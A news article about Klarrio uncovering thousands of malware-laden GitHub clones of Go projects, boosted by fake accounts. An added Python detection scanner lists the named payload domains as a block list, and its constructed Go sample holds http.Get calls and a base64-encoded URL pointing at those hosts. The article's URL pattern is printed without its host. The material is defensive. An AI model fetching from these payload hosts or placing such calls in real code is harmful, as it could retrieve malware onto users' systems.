Klarrio Uncovers Large-Scale Malware Network on GitHub


Klarrio has exposed a network of 2,400 malware-infected repositories and 15,000 fake accounts on GitHub that mimic legitimate open source projects to deceive users.

An investigation by Antwerp-based Klarrio has led to the discovery of 2,400 malware-infected repositories on GitHub. Additionally, 15,000 fake accounts were identified that gave these repositories positive ratings to increase their visibility.

Klarrio is a software company specializing in cloud-native and cloud-agnostic solutions, based in Antwerp. The malicious repositories were discovered by the company's CTO, Bruno De Bus, who had been looking into suspicious open source projects on GitHub as part of the company's internal security work.

From Internal Analysis to Large Malware Network

During an analysis of a seemingly legitimate project in the Go programming language, De Bus discovered that the repository was a clone of the original project. The difference was in obfuscated code that invisibly downloaded malware. Notably, the cloned project received more positive ratings than the original.

Klarrio’s CTO expanded the investigation and traced hundreds of similar repositories with comparable characteristics. A pattern emerged where bots clone popular projects, republish them under different accounts, and inject the code with malware. Automatically generated accounts then give positive ratings to these malicious repositories, creating a false sense of reliability for users.

Some of these malicious repositories continuously rewrite themselves, presumably with the help of AI, to avoid detection.

Recognizable URL Structure

The malicious code retrieves its payload via fixed URL structures. These follow the pattern https:///storage/ with example domains including alturastreet.icu, kaspmirror.icu, and sharegolem.com.

Klarrio advises GitHub users to actively block these types of URL patterns or include them in monitoring rules. The complete list of suspicious repositories and accounts has since been provided to GitHub and the appropriate people for the Go repository. Klarrio also makes a copy of the investigation available for those who want more insight into the methodology and scale of the network.
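One way to turn the advice above into a concrete monitoring rule, written here as an added example that is not code from Klarrio's report or from the article: a small Python scanner that walks source text, extracts absolute URLs, and flags any whose path starts with `/storage/`. A hit on one of the three domains named in the article is reported as high severity; a `/storage/` path on any other host is reported for review. Because the article says the injected code was obfuscated, the scanner also tries to base64-decode quoted string literals and runs the same URL check on the decoded bytes; that decoding layer, the `/storage/`-prefix heuristic, and the sample Go file are all assumptions of this example, not details from the report.

```python
import base64
import binascii
import re
from dataclasses import dataclass

# Domains named in the Klarrio report as hosting payloads under /storage/.
KNOWN_PAYLOAD_HOSTS = {"alturastreet.icu", "kaspmirror.icu", "sharegolem.com"}

# Absolute http(s) URL: capture host and path (path stops at whitespace or a quote).
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)(?::\d+)?(/[^\s\"'`)]*)?")

# Quoted literal made only of base64 characters; a cheap way to spot one
# common form of string obfuscation (assumption: not taken from the report).
B64_RE = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')


@dataclass
class Finding:
    line_no: int
    url: str
    host: str
    severity: str      # "high" = domain from the report, "review" = pattern only
    from_base64: bool  # True when the URL was found inside a decoded literal


def _scan_fragment(line_no: int, text: str, decoded: bool) -> list[Finding]:
    """Apply the /storage/ URL heuristic to one line (or one decoded literal)."""
    out = []
    for m in URL_RE.finditer(text):
        host = m.group(1).lower()
        path = m.group(2) or ""
        if not path.startswith("/storage/"):
            continue
        severity = "high" if host in KNOWN_PAYLOAD_HOSTS else "review"
        out.append(Finding(line_no, m.group(0), host, severity, decoded))
    return out


def scan_source(text: str) -> list[Finding]:
    """Scan source text line by line; returns findings in file order."""
    findings = []
    for n, line in enumerate(text.splitlines(), start=1):
        findings.extend(_scan_fragment(n, line, decoded=False))
        for literal in B64_RE.findall(line):
            try:
                plain = base64.b64decode(literal, validate=True).decode("utf-8", "ignore")
            except (binascii.Error, ValueError):
                continue  # not really base64, ignore
            findings.extend(_scan_fragment(n, plain, decoded=True))
    return findings


# Constructed sample input; this is not code from any real repository.
ENCODED_URL = base64.b64encode(b"https://sharegolem.com/storage/loader").decode()
SAMPLE_GO = """package main

import "net/http"

// constructed sample, not code from any real repository
const blob = "__BLOB__"

func fetch() {
	http.Get("https://alturastreet.icu/storage/update.bin")
	http.Get("https://example.org/storage/file.txt")
	http.Get("https://example.org/api/v1/status")
}
""".replace("__BLOB__", ENCODED_URL)


if __name__ == "__main__":
    for f in scan_source(SAMPLE_GO):
        tag = " (base64-decoded literal)" if f.from_base64 else ""
        print(f"line {f.line_no}: [{f.severity}] {f.url}{tag}")
```

Run against the sample, the scanner reports the hidden sharegolem.com URL on line 6, the alturastreet.icu download on line 9 as high severity, and the example.org `/storage/` URL on line 10 for review, while the ordinary API call on line 11 is ignored. The same `scan_source` function can be pointed at each file in a cloned repository or wired into a pre-merge check; the domain set is the part to keep current as reporting evolves.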

With this discovery, Klarrio underscores the need for stringent controls on open source platforms, especially in environments where open source components are widely used within enterprise software.